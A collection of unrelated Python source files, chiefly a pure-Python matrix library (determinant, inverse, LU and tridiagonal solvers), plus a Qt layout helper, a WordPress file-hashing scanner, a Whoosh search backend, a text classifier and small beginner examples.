+ x16*x65 + x16*x70 - x16*x77 - x17*x22 + x18*x19 + x18*x26
- x18*x37 - x18*x5 - x18*x68 + x18*x71 - x19*x4 - x2*x25
+ x2*x3 + x2*x32 + x2*x56 - x2*x59 + x20*x21 + x20*x44
- x20*x52 - x20*x69 + x20*x74 + x22*x23 + x22*x58 - x22*x65
- x22*x70 + x22*x77 + x24*x6 - x26*x4 - x27*x6 + x28*x29
- x28*x34 - x28*x46 + x28*x49 + x28*x60 - x28*x63 - x29*x33
+ x30*x31 - x30*x39 - x30*x47 + x30*x53 + x30*x72 - x30*x75
- x31*x38 + x33*x34 + x33*x46 - x33*x49 - x33*x60 + x33*x63
+ x35*x36 - x35*x41 - x35*x61 + x35*x66 + x35*x73 - x35*x78
- x36*x40 + x37*x4 + x38*x39 + x38*x47 - x38*x53 - x38*x72
+ x38*x75 + x4*x5 + x4*x68 - x4*x71 + x40*x41 + x40*x61
- x40*x66 - x40*x73 + x40*x78 - x42*x6 - x43*x8 + x45*x6
+ x48*x8 + x50*x51 - x50*x55 - x50*x64 + x50*x67 + x50*x76
- x50*x79 - x51*x54 + x54*x55 + x54*x64 - x54*x67 - x54*x76
+ x54*x79 + x57*x8 + x6*x7 - x62*x8 + x8*x9)
else:
# TODO algorithm?
import numpy as np
return float(np.linalg.det(matrix))
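# Small hand-checked examples for det():
#   det([[1.0, 2.0], [3.0, 4.0]])                      -> -2.0
#   det([[1.0, 0.0, 0.0],
#        [0.0, 2.0, 0.0],
#        [0.0, 0.0, 3.0]])                             -> 6.0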
def inv(matrix):
"""5 has way too many multiplies.
>> from sympy import *
>> from sympy.abc import *
>> Matrix([a]).inv()
Matrix([[1/a]])
>> cse(Matrix([[a, b], [c, d]]).inv())
Matrix([
[1/a + b*c/(a**2*(d - b*c/a)), -b/(a*(d - b*c/a))],
[ -c/(a*(d - b*c/a)), 1/(d - b*c/a)]])
>> m_3 = Matrix([[a, b, c], [d, e, f], [g, h, i]])
>> #cse(m_3.inv())
>> m_4 = Matrix([[a, b, c, d], [e, f, g, h], [i, j, k, l], [m, n, o, p]])
>> cse(m_4.inv())
# Note: for 3, 4 - forgot to generate code using optimizations='basic'
"""
size = len(matrix)
if size == 1:
try:
return [1.0/matrix[0]]
except:
return [1.0/matrix[0][0]]
elif size == 2:
try:
(a, b), (c, d) = matrix
x0 = 1.0/a
x1 = b*x0
x2 = 1.0/(d - c*x1)
x3 = c*x2
return [[x0 + b*x3*x0*x0, -x1*x2],
[-x0*x3, x2]]
except:
import numpy as np
return np.linalg.inv(matrix).tolist()
elif size == 3:
(a, b, c), (d, e, f), (g, h, i) = matrix
x0 = 1./a
x1 = b*d
x2 = e - x0*x1
x3 = 1./x2
x4 = b*g
x5 = h - x0*x4
x6 = x0*x3
x7 = d*x6
x8 = -g*x0 + x5*x7
x9 = c*d
x10 = f - x0*x9
x11 = b*x6
x12 = c*x0 - x10*x11
x13 = a*e
x14 = -x1 + x13
x15 = 1./(-a*f*h - c*e*g + f*x4 + h*x9 - i*x1 + i*x13)
x16 = x14*x15
x17 = x12*x16
x18 = x14*x15*x3
x19 = x18*x5
x20 = x10*x18
return [[x0 - x17*x8 + x1*x3*x0*x0, -x11 + x12*x19, -x17],
[-x20*x8 - x7, x10*x16*x5*x2**-2 + x3, -x20],
[ x16*x8, -x19, x16]]
elif size == 4:
(a, b, c, d), (e, f, g, h), (i, j, k, l), (m, n, o, p) = matrix
x0 = 1./a
x1 = b*e
x2 = f - x0*x1
x3 = 1./x2
x4 = i*x0
x5 = -b*x4 + j
x6 = x0*x3
x7 = e*x6
x8 = -x4 + x5*x7
x9 = c*x0
x10 = -e*x9 + g
x11 = b*x6
x12 = -x10*x11 + x9
x13 = a*f
x14 = -x1 + x13
x15 = k*x13
x16 = b*g*i
x17 = c*e*j
x18 = a*g*j
x19 = k*x1
x20 = c*f*i
x21 = x15 + x16 + x17 - x18 - x19 - x20
x22 = 1/x21
x23 = x14*x22
x24 = x12*x23
x25 = m*x0
x26 = -b*x25 + n
x27 = x26*x3
x28 = -m*x9 + o - x10*x27
x29 = x23*x8
x30 = -x25 + x26*x7 - x28*x29
x31 = d*x0
x32 = -e*x31 + h
x33 = x3*x32
x34 = -i*x31 + l - x33*x5
x35 = -x11*x32 - x24*x34 + x31
x36 = a*n
x37 = g*l
x38 = h*o
x39 = l*o
x40 = b*m
x41 = h*k
x42 = c*l
x43 = f*m
x44 = c*h
x45 = i*n
x46 = d*k
x47 = e*n
x48 = d*o
x49 = d*g
x50 = j*m
x51 = 1.0/(a*j*x38 - b*i*x38 - e*j*x48 + f*i*x48 + p*x15
+ p*x16 + p*x17 - p*x18 - p*x19 - p*x20 + x1*x39
- x13*x39 + x36*x37 - x36*x41 - x37*x40 + x40*x41
+ x42*x43 - x42*x47 - x43*x46 + x44*x45 - x44*x50
- x45*x49 + x46*x47 + x49*x50)
x52 = x21*x51
x53 = x35*x52
x54 = x14*x22*x3
x55 = x5*x54
x56 = -x27 + x28*x55
x57 = x52*x56
x58 = x14*x51
x59 = x28*x58
x60 = x10*x54
x61 = x33 - x34*x60
x62 = x52*x61
x63 = x34*x58
return [[x0 - x24*x8 - x30*x53 + x1*x3*x0*x0, -x11 + x12*x55 - x35*x57, -x24 + x35*x59, -x53],
[-x30*x62 - x60*x8 - x7, x10*x23*x5*x2**-2 + x3 - x56*x62, x59*x61 - x60, -x62],
[x29 - x30*x63, -x55 - x56*x63, x14*x14*x22*x28*x34*x51 + x23, -x63],
[x30*x52, x57, -x59, x52]]
else:
return inv_lu(matrix)
# TODO algorithm?
# import numpy as np
# return np.linalg.inv(matrix).tolist()
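# Hedged usage sketch (added, not original code): verify that inv() really
# inverts a small matrix by checking that inv(A) applied to A*x recovers x,
# using the module's own dot() for the matrix-vector products.
def _inv_example():
    A = [[4.0, 1.0, 0.0],
         [1.0, 3.0, 1.0],
         [0.0, 1.0, 2.0]]
    x = [1.0, -2.0, 0.5]
    Ax = dot(A, x)
    x_back = dot(inv(A), Ax)
    assert all(abs(xi - xbi) < 1e-9 for xi, xbi in zip(x, x_back))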
def shape(value):
'''Find and return the shape of an array, whether it is a numpy array or
a list-of-lists or other combination of iterators.
Parameters
----------
value : various
Input array, [-]
Returns
-------
shape : tuple(int, dimension)
Dimensions of array, [-]
Notes
-----
It is assumed the shape is consistent - not something like [[1.1, 2.2], [2.4]]
Examples
--------
>>> shape([])
(0,)
>>> shape([1.1, 2.2, 5.5])
(3,)
>>> shape([[1.1, 2.2, 5.5], [2.0, 1.1, 1.5]])
(2, 3)
>>> shape([[[1.1,], [2.0], [1.1]]])
(1, 3, 1)
>>> shape(['110-54-3'])
(1,)
'''
try:
return value.shape
except:
pass
dims = [len(value)]
    try:
        # The try/except handles the case of an empty value with no first element.
iter_value = value[0]
for i in range(10):
# try:
if type(iter_value) in primitive_containers:
dims.append(len(iter_value))
iter_value = iter_value[0]
else:
break
# except:
# break
except:
pass
return tuple(dims)
# try:
# try:
# new_shape = (len(value), len(value[0]), len(value[0][0]))
# except:
# new_shape = (len(value), len(value[0]))
# except:
# new_shape = (len(value),)
# return new_shape
def eye(N):
mat = []
for i in range(N):
r = [0.0]*N
r[i] = 1.0
mat.append(r)
return mat
def dot(a, b):
try:
ab = [sum([ri*bi for ri, bi in zip(row, b)]) for row in a]
except:
ab = [sum([ai*bi for ai, bi in zip(a, b)])]
return ab
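# Hedged note (added): dot() is intentionally loose about shapes - it tries a
# matrix-vector product first and falls back to a plain vector dot product
# (returned as a one-element list) when the rows are not iterable.
def _dot_example():
    assert dot([[1.0, 2.0], [3.0, 4.0]], [1.0, 1.0]) == [3.0, 7.0]   # matrix @ vector
    assert dot([1.0, 2.0, 3.0], [4.0, 5.0, 6.0]) == [32.0]           # vector . vector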
def inner_product(a, b):
tot = 0.0
for i in range(len(a)):
tot += a[i]*b[i]
return tot
def inplace_LU(A, ipivot, N):
    # Crout-style LU decomposition with partial pivoting, performed in place
    # using 1-based indexing; row 0 and column 0 of A are padding. The pivot
    # row chosen at each step is recorded in ipivot.
    Np1 = N+1
for j in range(1, Np1):
for i in range(1, j):
tot = A[i][j]
for k in range(1, i):
tot -= A[i][k]*A[k][j]
A[i][j] = tot
apiv = 0.0
for i in range(j, Np1):
tot = A[i][j]
for k in range(1, j):
tot -= A[i][k]*A[k][j]
A[i][j] = tot
if apiv < abs(A[i][j]):
apiv, ipiv = abs(A[i][j]), i
if apiv == 0:
raise ValueError("Singular matrix")
ipivot[j] = ipiv
if ipiv != j:
for k in range(1, Np1):
t = A[ipiv][k]
A[ipiv][k] = A[j][k]
A[j][k] = t
Ajjinv = 1.0/A[j][j]
for i in range(j+1, Np1):
A[i][j] *= Ajjinv
return None
def solve_from_lu(A, pivots, b, N):
    # Forward and back substitution against the 1-indexed LU factors produced
    # by inplace_LU().
    Np1 = N + 1
    # Note: list(b) is comparatively slow here; a list comprehension is faster.
    b = [0.0] + [i for i in b]
for i in range(1, Np1):
tot = b[pivots[i]]
b[pivots[i]] = b[i]
for j in range(1, i):
tot -= A[i][j]*b[j]
b[i] = tot
for i in range(N, 0, -1):
tot = b[i]
for j in range(i+1, Np1):
tot -= A[i][j]*b[j]
b[i] = tot/A[i][i]
return b
def solve_LU_decomposition(A, b):
N = len(b)
A_copy = [[0.0]*(N+1)]
for row in A:
        # Note: list(row) is comparatively slow here; a list comprehension is faster.
r = [0.0] + [i for i in row]
# r = list(row)
# r.insert(0, 0.0)
A_copy.append(r)
pivots = [0.0]*(N+1)
inplace_LU(A_copy, pivots, N)
return solve_from_lu(A_copy, pivots, b, N)[1:]
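# Hedged usage sketch (added for illustration): solve a small dense system with
# the pure-Python LU path and check the residual against the original system.
def _solve_LU_example():
    A = [[2.0, 1.0, 1.0, 0.0],
         [4.0, 3.0, 3.0, 1.0],
         [8.0, 7.0, 9.0, 5.0],
         [6.0, 7.0, 9.0, 8.0]]
    b = [4.0, 11.0, 29.0, 30.0]
    x = solve_LU_decomposition(A, b)
    residual = [abs(bi - ri) for bi, ri in zip(b, dot(A, x))]
    assert max(residual) < 1e-9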
def inv_lu(a):
N = len(a)
Np1 = N + 1
A_copy = [[0.0]*Np1]
for row in a:
        # Note: list(row) is comparatively slow here; a list comprehension is faster.
        r = [0.0] + [i for i in row]
A_copy.append(r)
a = A_copy
ainv = [[0.0]*N for i in range(N)]
pivots = [0]*Np1
inplace_LU(a, pivots, N)
for j in range(N):
b = [0.0]*N
b[j] = 1.0
b = solve_from_lu(a, pivots, b, N)[1:]
for i in range(N):
ainv[i][j] = b[i]
return ainv
def solve(a, b):
if len(a) > 4:
        if IS_PYPY or np is None:
            return solve_LU_decomposition(a, b)
        # np is the module-level numpy import (None when numpy is unavailable);
        # re-importing it here would make `np` local to this function and break
        # the check above with an UnboundLocalError.
        return np.linalg.solve(a, b).tolist()
else:
return dot(inv(a), b)
def norm2(arr):
tot = 0.0
for i in arr:
tot += i*i
return sqrt(tot)
def array_as_tridiagonals(arr):
row_last = arr[0]
a, b, c = [], [row_last[0]], []
for i in range(1, len(row_last)):
row = arr[i]
b.append(row[i])
c.append(row_last[i])
a.append(row[i-1])
row_last = row
return a, b, c
def tridiagonals_as_array(a, b, c, zero=0.0):
N = len(b)
arr = [[zero]*N for _ in range(N)]
row_last = arr[0]
row_last[0] = b[0]
for i in range(1, N):
row = arr[i]
row[i] = b[i] # set the middle row back
row[i-1] = a[i-1]
row_last[i] = c[i-1]
row_last = row
return arr
def solve_tridiagonal(a, b, c, d):
b, d = [i for i in b], [i for i in d]
N = len(d)
for i in range(N - 1):
m = a[i]/b[i]
b[i+1] -= m*c[i]
d[i+1] -= m*d[i]
b[-1] = d[-1]/b[-1]
for i in range(N-2, -1, -1):
b[i] = (d[i] - c[i]*b[i+1])/b[i]
return b
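# Hedged cross-check (added): solve the same tridiagonal system with the
# Thomas-algorithm routine above and with the generic dense solver, after
# expanding the three diagonals back into a full matrix.
def _tridiagonal_example():
    a = [1.0, 1.0, 1.0]        # sub-diagonal
    b = [4.0, 4.0, 4.0, 4.0]   # main diagonal
    c = [2.0, 2.0, 2.0]        # super-diagonal
    d = [7.0, 8.0, 9.0, 10.0]  # right-hand side
    x_thomas = solve_tridiagonal(a, b, c, d)
    x_dense = solve(tridiagonals_as_array(a, b, c), d)
    assert all(abs(i - j) < 1e-9 for i, j in zip(x_thomas, x_dense))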
def subset_matrix(whole, subset):
    if type(subset) is slice:
        # slice.indices() resolves None start/stop/step against the matrix size.
        subset = range(*subset.indices(len(whole)))
# N = len(subset)
# new = [[None]*N for i in range(N)]
# for ni, i in enumerate(subset):
# for nj,j in enumerate(subset):
# new[ni][nj] = whole[i][j]
new = []
for i in subset:
whole_i = whole[i]
# r = [whole_i[j] for j in subset]
# new.append(r)
new.append([whole_i[j] for j in subset])
# r = []
# for j in subset:
# r.append(whole_i[j])
return new
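# Hedged usage sketch (added): subset_matrix() extracts the square submatrix
# formed by a set of row/column indices, given either as a slice or a sequence.
def _subset_matrix_example():
    whole = [[11.0, 12.0, 13.0],
             [21.0, 22.0, 23.0],
             [31.0, 32.0, 33.0]]
    assert subset_matrix(whole, [0, 2]) == [[11.0, 13.0], [31.0, 33.0]]
    assert subset_matrix(whole, slice(0, 2, 1)) == [[11.0, 12.0], [21.0, 22.0]]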
|
python
|
""" QLayouted module. """
# ISC License
#
# Copyright (c) 2020–2022, Paul Wilhelm, M. Sc. <[email protected]>
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
from typing import Dict, Tuple, Callable, Union, Optional
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QVBoxLayout, QHBoxLayout, QLayout, QWidget, QPushButton
from magneticalc.QtWidgets2.QButtons import QButtons
class QLayouted:
""" QLayouted class. """
def __init__(self, direction: str = "vertical") -> None:
"""
Initializes the QLayouted class.
This adds a layout and several related functions like addWidget() to the parent class.
@param direction: Sets "vertical" or "horizontal" layout
"""
self._layout = QVBoxLayout() if direction == "vertical" else QHBoxLayout()
def install_layout(self, parent: QWidget) -> None:
"""
Installs this layout in the parent.
"""
parent.setLayout(self._layout)
# noinspection PyPep8Naming
def addWidget(self, widget, alignment: Optional[Union[Qt.Alignment, Qt.AlignmentFlag]] = None) -> None:
"""
Adds widget.
@param widget: QWidget
@param alignment: Alignment
"""
        if alignment:
            self._layout.addWidget(widget, alignment=alignment)
        else:
            self._layout.addWidget(widget)
# noinspection PyPep8Naming
def addLayout(self, layout: QLayout) -> None:
"""
Adds layout.
@param layout: QLayout
"""
self._layout.addLayout(layout)
# noinspection PyPep8Naming
def addSpacing(self, spacing: int) -> None:
"""
Adds spacing.
@param spacing: Spacing value
"""
self._layout.addSpacing(spacing)
# noinspection PyPep8Naming
def addButtons(self, data: Dict[str, Tuple[str, Callable]]) -> Dict[int, QPushButton]:
"""
Adds buttons.
@param data: Dictionary {text: (icon, callback), …}
@return: Dictionary {index: QPushButton, …}
"""
buttons = QButtons(data)
self.addLayout(buttons)
return buttons.dictionary
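# Hedged usage sketch (an addition, not part of magneticalc): a widget class is
# expected to inherit from both QWidget and QLayouted, initialize the mixin,
# install the layout on itself and then add children through the mixin helpers.
# The widget contents, button labels and icon identifiers below are placeholders
# assumed for illustration only.
class _QLayoutedDemoWidget(QWidget, QLayouted):
    """ Minimal demonstration widget built on the QLayouted mixin. """

    def __init__(self) -> None:
        """ Initializes the demonstration widget. """
        from PyQt5.QtWidgets import QLabel
        QWidget.__init__(self)
        QLayouted.__init__(self, direction="vertical")
        self.install_layout(self)
        self.addWidget(QLabel("Hello"))
        self.addSpacing(8)
        self.buttons = self.addButtons({
            "OK": ("fa.check", self.close),      # icon names assumed, not verified
            "Cancel": ("fa.times", self.close)
        })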
|
python
|
#import json
def parse(command):
#split = json.loads(command)
#parsedCommand = split
return command
def main():
pass
if __name__ == "__main__":
main()
|
python
|
from happy_bittorrent.algorithms.torrent_manager import *
|
python
|
import pytest
import shutil
import zipfile
from pathlib import Path
from squirrel.settings import AddonInstallerSettings
from squirrel.addons import ZipAddon
from test_addon_install import test_addon_install_path
from test_addon_install import test_addon_backup_path
from test_addon_install import settings
from fixtures import zip_files
from fixtures import valid_addons
from fixtures import invalid_addons
# Gather valid addons
# Install them
# @pytest.mark.parametrize('file_or_folder', valid_addons)
@pytest.mark.parametrize('targets', [valid_addons, ])
def test_install_valid_addons_and_index(
    targets,
    settings,
    zip_files,
    test_addon_install_path,
    test_addon_backup_path,
):
settings.addon_path = test_addon_install_path
settings.backup_path = test_addon_backup_path
addons = [ZipAddon(zip_file, settings=settings) for zip_file in zip_files]
for addon in addons:
addon.install()
# addon = ZipAddon(addon_filename=zip_file, settings=settings)
# addon.install()
# Run the indexing
# Check the index content
|
python
|
#!/usr/bin/python
import csv
import hashlib
import os
import sys
idx = 1
IGNORED_DIRECTORIES = {'.git', '.svn'}
def walk(version_root, app, version):
    if isinstance(version, bytes):
version = version.decode("utf8")
if version in IGNORED_DIRECTORIES:
return
global idx
print('av %d %s' % (idx, version_root), file=sys.stderr)
idx += 1
for root, d_names, f_names in os.walk(version_root):
for ignored_directory in IGNORED_DIRECTORIES:
if ignored_directory in d_names:
d_names.remove(ignored_directory)
for f in f_names:
try:
file_path = os.path.join(root, f)
hsh = sha256_f(file_path)
# print('%s\t%s\t%s\t%s\t%s' % (
# app, version, hsh, remove_prefix(file_path, version_root).count('/'), file_path))
print('%s\t%s\t%s\t%s' % (app, version, hsh, remove_prefix(file_path, version_root).count('/')))
except:
print('err: %s' % str(sys.exc_info()), file=sys.stderr)
BLOCK_SIZE = 16 * (2 ** 10)
def sha256_f(path):
sha256_hash = hashlib.sha256()
with open(path, 'rb') as f:
for byte_block in iter(lambda: f.read(BLOCK_SIZE), b""):
sha256_hash.update(byte_block)
return sha256_hash.hexdigest()
def remove_prefix(string, prefix):
return string[len(prefix):] if string.startswith(prefix) else string
def subdirectories(path):
return [(x, os.path.join(path, x)) for x in os.listdir(path) if os.path.isdir(os.path.join(path, x))]
def main(root, db):
already_parsed_avs = set()
if db is not None:
with open(db, 'r') as db_file:
for row in csv.reader(db_file, delimiter='\t'):
already_parsed_avs.add((row[0], row[1]))
def filtered_walk(vp, a, v):
if not ((a, v) in already_parsed_avs):
walk(vp, a, v)
for (directory, path) in subdirectories(root):
app = directory
if app.endswith('-cores'):
for (version, version_path) in subdirectories(path):
filtered_walk(version_path, app, version)
elif app.endswith('-themes'):
for (app, app_path) in subdirectories(path):
app = 'wp.t' + app
for (version, version_path) in subdirectories(app_path):
filtered_walk(version_path, app, version)
elif app.endswith('-plugins'):
for (app, app_path) in subdirectories(path):
app = 'wp.p' + app
trunk_path = os.path.join(app_path, 'trunk')
tags_path = os.path.join(app_path, 'tags')
if os.path.isdir(trunk_path):
filtered_walk(trunk_path, app, 'trunk')
if os.path.isdir(tags_path):
for (version, version_path) in subdirectories(tags_path):
filtered_walk(version_path, app, version)
# local testing only branch!
# else:
# for (version, version_path) in subdirectories(path):
# filtered_walk(version_path, app, version)
if __name__ == '__main__':
if len(sys.argv) < 2:
print('scanner.py path_to_scan [already_scanned_av_csv]', file=sys.stderr)
elif len(sys.argv) == 2:
main(sys.argv[1], None)
elif len(sys.argv) > 2:
main(sys.argv[1], sys.argv[2])
|
python
|
import logging
from pathlib import Path
import whoosh
from whoosh import qparser
from whoosh.filedb.filestore import FileStorage
from whoosh.index import EmptyIndexError
from whoosh.query import Every
from django.conf import settings
from mayan.apps.common.utils import any_to_bool, parse_range
from mayan.apps.lock_manager.backends.base import LockingBackend
from mayan.apps.lock_manager.exceptions import LockError
from ..classes import SearchBackend, SearchModel
from ..exceptions import DynamicSearchRetry
from ..settings import setting_results_limit
from .literals import (
DJANGO_TO_WHOOSH_FIELD_MAP, TEXT_LOCK_INSTANCE_DEINDEX,
TEXT_LOCK_INSTANCE_INDEX, WHOOSH_INDEX_DIRECTORY_NAME,
)
logger = logging.getLogger(name=__name__)
class WhooshSearchBackend(SearchBackend):
field_map = DJANGO_TO_WHOOSH_FIELD_MAP
def __init__(self, **kwargs):
index_path = kwargs.pop('index_path', None)
writer_limitmb = kwargs.pop('writer_limitmb', 128)
writer_multisegment = kwargs.pop('writer_multisegment', False)
writer_procs = kwargs.pop('writer_procs', 1)
super().__init__(**kwargs)
self.index_path = Path(
index_path or Path(settings.MEDIA_ROOT, WHOOSH_INDEX_DIRECTORY_NAME)
)
if writer_limitmb:
writer_limitmb = int(writer_limitmb)
if writer_multisegment:
writer_multisegment = any_to_bool(value=writer_multisegment)
if writer_procs:
writer_procs = int(writer_procs)
self.writer_kwargs = {
'limitmb': writer_limitmb, 'multisegment': writer_multisegment,
'procs': writer_procs
}
def _get_status(self):
result = []
title = 'Whoosh search model indexing status'
result.append(title)
result.append(len(title) * '=')
for search_model in SearchModel.all():
index = self.get_or_create_index(search_model=search_model)
search_results = index.searcher().search(Every('id'))
result.append(
'{}: {}'.format(
search_model.label, search_results.estimated_length()
)
)
return '\n'.join(result)
def _initialize(self):
self.index_path.mkdir(exist_ok=True)
def _search(
self, query, search_model, user, global_and_search=False,
ignore_limit=False
):
index = self.get_or_create_index(search_model=search_model)
id_list = []
with index.searcher() as searcher:
search_string = []
for key, value in query.items():
search_string.append(
'{}:({})'.format(key, value)
)
global_logic_string = ' AND ' if global_and_search else ' OR '
search_string = global_logic_string.join(search_string)
logger.debug('search_string: %s', search_string)
parser = qparser.QueryParser(
fieldname='_', schema=index.schema
)
parser.remove_plugin_class(cls=qparser.WildcardPlugin)
parser.add_plugin(pin=qparser.PrefixPlugin())
whoosh_query = parser.parse(text=search_string)
if ignore_limit:
limit = None
else:
limit = setting_results_limit.value
results = searcher.search(q=whoosh_query, limit=limit)
logger.debug('results: %s', results)
for result in results:
id_list.append(result['id'])
return search_model.get_queryset().filter(
id__in=id_list
).distinct()
def clear_search_model_index(self, search_model):
schema = self.get_search_model_schema(search_model=search_model)
# Clear the model index.
self.get_storage().create_index(
indexname=search_model.get_full_name(), schema=schema
)
def deindex_instance(self, instance):
try:
lock = LockingBackend.get_backend().acquire_lock(
name=TEXT_LOCK_INSTANCE_DEINDEX
)
except LockError:
raise
else:
try:
search_model = SearchModel.get_for_model(instance=instance)
index = self.get_or_create_index(search_model=search_model)
with index.writer(**self.writer_kwargs) as writer:
writer.delete_by_term('id', str(instance.pk))
finally:
lock.release()
def get_or_create_index(self, search_model):
storage = self.get_storage()
schema = self.get_search_model_schema(search_model=search_model)
try:
# Explicitly specify the schema. Allows using existing index
# when the schema changes.
index = storage.open_index(
indexname=search_model.get_full_name(), schema=schema
)
except EmptyIndexError:
index = storage.create_index(
indexname=search_model.get_full_name(), schema=schema
)
return index
def get_search_model_schema(self, search_model):
field_map = self.get_resolved_field_map(search_model=search_model)
schema_kwargs = {key: value['field'] for key, value in field_map.items()}
return whoosh.fields.Schema(**schema_kwargs)
def get_storage(self):
return FileStorage(path=self.index_path)
def index_instance(self, instance, exclude_model=None, exclude_kwargs=None):
try:
lock = LockingBackend.get_backend().acquire_lock(
name=TEXT_LOCK_INSTANCE_INDEX
)
except LockError:
raise
else:
try:
search_model = SearchModel.get_for_model(instance=instance)
index = self.get_or_create_index(search_model=search_model)
with index.writer(**self.writer_kwargs) as writer:
kwargs = search_model.populate(
backend=self, instance=instance,
exclude_model=exclude_model,
exclude_kwargs=exclude_kwargs
)
try:
writer.delete_by_term('id', str(instance.pk))
writer.add_document(**kwargs)
except Exception as exception:
logger.error(
'Unexpected exception while indexing object '
'id: %(id)s, search model: %(search_model)s, '
'index data: %(index_data)s, raw data: '
'%(raw_data)s, field map: %(field_map)s; '
'%(exception)s' % {
'exception': exception,
'field_map': self.get_resolved_field_map(
search_model=search_model
),
'id': instance.pk,
'index_data': kwargs,
'raw_data': instance.__dict__,
'search_model': search_model.get_full_name()
}, exc_info=True
)
raise
except whoosh.index.LockError:
raise DynamicSearchRetry
finally:
lock.release()
def index_search_model(self, search_model, range_string=None):
        queryset = search_model.get_queryset()
if range_string:
queryset = queryset.filter(
pk__in=list(parse_range(range_string=range_string))
)
for instance in queryset:
self.index_instance(instance=instance)
def reset(self, search_model=None):
self.tear_down(search_model=search_model)
self.update_mappings(search_model=search_model)
def tear_down(self, search_model=None):
if search_model:
search_models = (search_model,)
else:
search_models = SearchModel.all()
for search_model in search_models:
self.clear_search_model_index(search_model=search_model)
def update_mappings(self, search_model=None):
if search_model:
search_models = (search_model,)
else:
search_models = SearchModel.all()
for search_model in search_models:
self.get_or_create_index(search_model=search_model)
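# Hedged standalone sketch (added for illustration, independent of Mayan EDMS):
# it demonstrates the query-string convention used by _search() above - each
# field/value pair becomes "field:(value)" and the pairs are joined with AND or
# OR - against a small in-memory whoosh index. Field names and documents here
# are made up.
def _whoosh_query_convention_example():
    from whoosh.fields import ID, TEXT, Schema
    from whoosh.filedb.filestore import RamStorage

    schema = Schema(id=ID(stored=True, unique=True), label=TEXT)
    index = RamStorage().create_index(schema)

    writer = index.writer()
    writer.add_document(id='1', label='first invoice')
    writer.add_document(id='2', label='second invoice')
    writer.commit()

    # Same construction as WhooshSearchBackend._search(): one term per field,
    # joined by the global AND/OR connector.
    query = {'label': 'invoice'}
    search_string = ' OR '.join(
        '{}:({})'.format(key, value) for key, value in query.items()
    )

    with index.searcher() as searcher:
        parser = qparser.QueryParser(fieldname='_', schema=index.schema)
        whoosh_query = parser.parse(text=search_string)
        return [hit['id'] for hit in searcher.search(q=whoosh_query, limit=None)]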
|
python
|
from __future__ import absolute_import
# Copyright (c) 2010-2018 openpyxl
from collections import defaultdict
class BoundDictionary(defaultdict):
"""
A default dictionary where elements are tightly coupled.
The factory method is responsible for binding the parent object to the child.
If a reference attribute is assigned then child objects will have the key assigned to this.
Otherwise it's just a defaultdict.
"""
def __init__(self, reference=None, *args, **kw):
self.reference = reference
super(BoundDictionary, self).__init__(*args, **kw)
def __getitem__(self, key):
value = super(BoundDictionary, self).__getitem__(key)
if self.reference is not None:
setattr(value, self.reference, key)
return value
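# Hedged usage sketch (added, not part of openpyxl): with a reference name set,
# the factory-created child is told which key it belongs to on first access.
class _Child:
    def __init__(self):
        self.parent = None

def _bound_dictionary_example():
    children = BoundDictionary('parent', _Child)
    child = children['A1']          # created by the factory...
    assert child.parent == 'A1'     # ...and bound back to its key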
|
python
|
import os
import random
import numpy as np
import pickle as pkl
import networkx as nx
import scipy.sparse as sp
from utils import loadWord2Vec
from math import log
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn import metrics
from sklearn.linear_model import LogisticRegression
from sklearn import svm
from sklearn.svm import LinearSVC
# build corpus
dataset = '20ng'
# shuffling
doc_name_list = []
doc_train_list = []
doc_test_list = []
f = open('data/' + dataset + '.txt', 'r')
for line in f.readlines():
doc_name_list.append(line.strip())
temp = line.split("\t")
if temp[1].find('test') != -1:
doc_test_list.append(line.strip())
elif temp[1].find('train') != -1:
doc_train_list.append(line.strip())
f.close()
doc_content_list = []
f = open('data/corpus/' + dataset + '.clean.txt', 'r')
for line in f.readlines():
doc_content_list.append(line.strip())
f.close()
train_ids = []
for train_name in doc_train_list:
train_id = doc_name_list.index(train_name)
train_ids.append(train_id)
print(train_ids)
random.shuffle(train_ids)
# partially labeled data
f = open('data/' + dataset + '.train.index', 'r')
lines = f.readlines()
f.close()
train_ids = [int(x.strip()) for x in lines]
#train_ids = train_ids[:int(0.2 * len(train_ids))]
test_ids = []
for test_name in doc_test_list:
test_id = doc_name_list.index(test_name)
test_ids.append(test_id)
print(test_ids)
random.shuffle(test_ids)
ids = train_ids + test_ids
print(ids)
print(len(ids))
train_size = len(train_ids)
val_size = int(0.1 * train_size)
real_train_size = train_size - val_size
shuffle_doc_name_list = []
shuffle_doc_words_list = []
for id in ids:
shuffle_doc_name_list.append(doc_name_list[int(id)])
shuffle_doc_words_list.append(doc_content_list[int(id)])
tfidf_vec = TfidfVectorizer() #max_features=50000
tfidf_matrix = tfidf_vec.fit_transform(shuffle_doc_words_list)
print(tfidf_matrix)
#tfidf_matrix_array = tfidf_matrix.toarray()
# BOW TFIDF + LR
#train_x = []
train_y = []
#test_x = []
test_y = []
for i in range(len(shuffle_doc_words_list)):
doc_words = shuffle_doc_words_list[i]
words = doc_words.split(' ')
doc_meta = shuffle_doc_name_list[i]
temp = doc_meta.split('\t')
label = temp[2]
if i < train_size:
#train_x.append(tfidf_matrix_array[i])
train_y.append(label)
else:
#test_x.append(tfidf_matrix_array[i])
test_y.append(label)
#clf = svm.SVC(decision_function_shape='ovr', class_weight="balanced",kernel='linear')
#clf = LinearSVC(random_state=0)
clf = LogisticRegression(random_state=1)
clf.fit(tfidf_matrix[:train_size], train_y)
predict_y = clf.predict(tfidf_matrix[train_size:])
correct_count = 0
for i in range(len(test_y)):
if predict_y[i] == test_y[i]:
correct_count += 1
accuracy = correct_count * 1.0 / len(test_y)
print(dataset, accuracy)
print("Precision, Recall and F1-Score...")
print(metrics.classification_report(test_y, predict_y, digits=4))
|
python
|
# Class 4. Píldoras Informáticas course.
print(5 + 6)
print(10 % 3)
print(5 ** 3)
print(9 / 2)
print(9 // 2)
